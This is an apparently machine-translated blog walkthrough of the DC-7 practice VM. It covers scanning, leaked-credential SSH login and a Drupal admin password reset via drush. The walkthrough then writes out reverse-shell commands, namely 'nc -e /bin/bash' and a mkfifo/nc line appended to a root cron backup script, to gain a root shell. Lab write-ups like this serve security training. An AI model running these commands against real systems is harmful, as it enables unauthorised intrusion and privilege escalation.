当前位置:网站首页>Dc-7 target
Dc-7 target
2022-07-07 06:06:00 【m0_ sixty-two million ninety-four thousand eight hundred and fo】
ifconfig
Find the host IP
Sweep a wave Intranet , Detect the surviving host
nmap 192.168.61.0/24
Use nmap Tool pair DC-5 The target machine scans the open port
nmap -A -T4 192.168.61.136 -p- -oN nmap136.A

nmap -A -T4 192.168.61.136 -p- -oN nmap136.A
Yes 22 and 80 port

Here's a hint DC7USER
use Baidu Search
You can download a file


This also shows that it is important
Download to kali Local
git clone https://github.com/Dc7User/staffdb
cd staffdb
ls
cat config.php

Use SSH Link target , Sign in dc7user It is found that you can successfully connect

ls
find out backups mbox
backups Next :website.sql.gpg website.tar.gz.gpg
Found two files , But it's all about gpg At the end of the ,gpg The command is used to encrypt files , The encrypted files are all garbled
mbox It's a document
The source code of backup execution is found in /opt/scripts Under the table of contents

Get into /opt/scripts Under the table of contents
cd /opt/scripts
see file
cat backups.sh

Found two commands gpg drush
gpg The command is used to encrypt ,drush The order is drupal Commands used in the framework to do some configuration , It can change the user name and password
Enter into /var/www/html Under the table of contents , Because the website will have a admin user , So use drush Command to change admin The user's password is 123456, It is found that it can be modified successfully
cd /var/www/html/
drush user-password admin --password="123456"
![]()
admin Your password has been changed to 123456
use dirb Command to scan out the page
dirb http://192.168.61.136

stay Content—>Add content-->Basic page Next , Ready to add PHP Code bounce shell, But found that it does not support PHP
After Baidu knows ,php To be imported as a separate module



PHP Module download address :
https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz


Check , Then click the bottom install

And then it's all right 
Go back to the page at that time , You can use PHP 了 


You can connect successfully with ant sword

And then use kali monitor
nc -lvvp 4444
nc -e /bin/bash 192.168.61.129 4444

python -c 'import pty;pty.spawn("/bin/bash")'
Successful connection

find / -name backups.sh 2>/dev/null
then
cd /opt/scripts
ls -l
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.61.129 7777 >/tmp/f" >> backups.sh
nc -lvvp 7777

Got it root jurisdiction
cd /root
ls
cat theflag.txt

边栏推荐
- C. colonne Swapping [tri + Simulation]
- 力扣102题:二叉树的层序遍历
- 【已解决】记一次EasyExcel的报错【读取xls文件时全表读不报错,指定sheet名读取报错】
- Nvisual network visualization
- SQLSTATE[HY000][1130] Host ‘host. docker. internal‘ is not allowed to connect to this MySQL server
- Storage of dental stem cells (to be continued)
- Career experience feedback to novice programmers
- Value range of various datetimes in SQL Server 2008
- Pytorch builds neural network to predict temperature
- Jstat of JVM command: View JVM statistics
猜你喜欢
随机推荐
Go 語言的 Context 詳解
Introduction to the extension implementation of SAP Spartacus checkout process
Pytorch builds neural network to predict temperature
关于STC单片机“假死”状态的判别
Flask1.1.4 Werkzeug1.0.1 源碼分析:啟動流程
Dynamic memory management
苹果cms V10模板/MXone Pro自适应影视电影网站模板
Industrial Finance 3.0: financial technology of "dredging blood vessels"
Classic questions about data storage
SQLSTATE[HY000][1130] Host ‘host. docker. internal‘ is not allowed to connect to this MySQL server
Go language learning notes - Gorm use - Gorm processing errors | web framework gin (10)
外设驱动库开发笔记43:GPIO模拟SPI驱动
Senior programmers must know and master. This article explains in detail the principle of MySQL master-slave synchronization, and recommends collecting
yarn入门(一篇就够了)
Harmonyos practice - Introduction to development, analysis of atomized services
On the discrimination of "fake death" state of STC single chip microcomputer
每秒10W次分词搜索,产品经理又提了一个需求!!!(收藏)
STM32 key state machine 2 - state simplification and long press function addition
R language [logic control] [mathematical operation]
POI excel export, one of my template methods
![C. colonne Swapping [tri + Simulation]](/img/0e/64d17980d3ec0051cdfb5fdb34e119.png)

![[云原生]微服务架构是什么?](/img/84/a0ec68646083f3539aa39ad9d98749.png)





